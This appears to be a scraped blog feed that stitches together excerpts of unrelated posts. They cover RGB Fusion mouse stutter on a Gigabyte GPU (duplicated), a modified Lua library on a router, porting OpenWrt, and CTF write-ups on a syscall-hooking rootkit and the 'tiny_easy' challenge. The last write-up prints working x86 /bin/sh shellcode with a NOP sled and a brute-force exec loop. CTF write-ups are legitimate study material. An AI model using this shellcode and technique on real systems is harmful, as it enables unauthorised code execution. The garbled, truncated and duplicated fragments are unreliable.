魔改解决超级雕rgb fusion鼠标卡顿问题
前言
仅供学习研究。
上个星期在海鲜市场收了一块技嘉超级雕6800XT,准备用来组黑苹果。
系统是Windows 11,到手之后安装了安装显卡驱动和技嘉rgb控制软件rgb fusion 2.0(B22.0414.1,官网最新版),小屏幕倒是挺好看的,但鼠标滑动总觉得时有点卡顿,用鼠标连续画圈最为明显(眼睛比较敏感)。
大约1秒卡顿一次。如下图所示,第一张图正常,第二张图第一个鼠标位置到第二个鼠标位置滑动距离过长,卡顿:
仅供学习研究。
上个星期在海鲜市场收了一块技嘉超级雕6800XT,准备用来组黑苹果。
系统是Windows 11,到手之后安装了安装显卡驱动和技嘉rgb控制软件rgb fusion 2.0(B22.0414.1,官网最新版),小屏幕倒是挺好看的,但鼠标滑动总觉得时有点卡顿,用鼠标连续画圈最为明显(眼睛比较敏感)。
大约1秒卡顿一次。如下图所示,第一张图正常,第二张图第一个鼠标位置到第二个鼠标位置滑动距离过长,卡顿:
某mips架构的路由器上的lua脚本a.lua,被编译成了luac二进制格式。初步分析发现指定lua使用固件中的共享库liblua.so.5.1.5可运行该luac文件,同架构的官方openwrt则不能运行该luac,所以判断出lialua.so.5.1.5被魔改了。
前几天在京东上买了个京东云无线宝鲁班,硬件配置如下:
1 | CPU:MT7621A |
本来天天放那边跑分换京豆的,但是这官方固件实在有点用不下去,所以给它搞个适配个openwrt吧。
首先ssh上去看看。
elf.py:
1 | ... |
有25次机会,每次可以读进程地址空间的32字节…
再看看gen.py。
rootkit is another challenge about kernel exploits after syscall.
After connected to host, I found that the kernel load rootkit module at boot.
1 | [ 3.337631] rootkit: module license 'unspecified' taints kernel. |
Then, I use ida to disassembly the rootkit.ko.
The module disable write protection, and replace original syscall such as sys_open
to sys_open_hooked
by write syscall table(0xc15fa020
).
The sys_open_hooked
syscall will check whether the string of the filename has a flag
substring.
If there not, then the original sys_open is called.
If there is, it returns a fd
with a value of -1
, then the file opening failed.
Of cource, other sys_call such as sys_symlink
will failed also.
1 | /tmp # ln -s ../flag ./ |
0x01
1 | { |
1 | { |
1 | $ checksec tiny_easy |
NX disasbled.
1 | 08048054 pop eax |
…?
What a tiny ELF..
1 | (gdb) b *0x08048056 |
Obviously, the “tiny_easy” move ‘/hom’ to $edx, and then call edx
let the program jump to address 0x6d6f682f
(/hom), then tiggered a segmentation fault.
1 | $ exec --help |
The command exec with -a argument can help us pass the specified argv[0] to COMMAND, which mean that we can put shellcode into the environment variable, and then pass a guessed shellcode address to argv[0], then get the shell by brute force.
But the problem is, how to make a shellcode?
I guess we need pwntools…
1 | $ python3 |
And the shellcode address:
1 | [email protected]:~$ export A=$(python -c 'print("jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")') |
Ok, use 0xffaabda0 as argv[0].
Befor do brute force, we should fill the shellcode by nop
(\x90
), to improve the success rate of call edx
.
1 | export A=$(python -c 'print("\x90" * 30000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")'); for i in {1..1000}; do bash -c "exec -a $(python -c 'print("\xa0\xbd\xaa\xff")') ./tiny_easy"; done |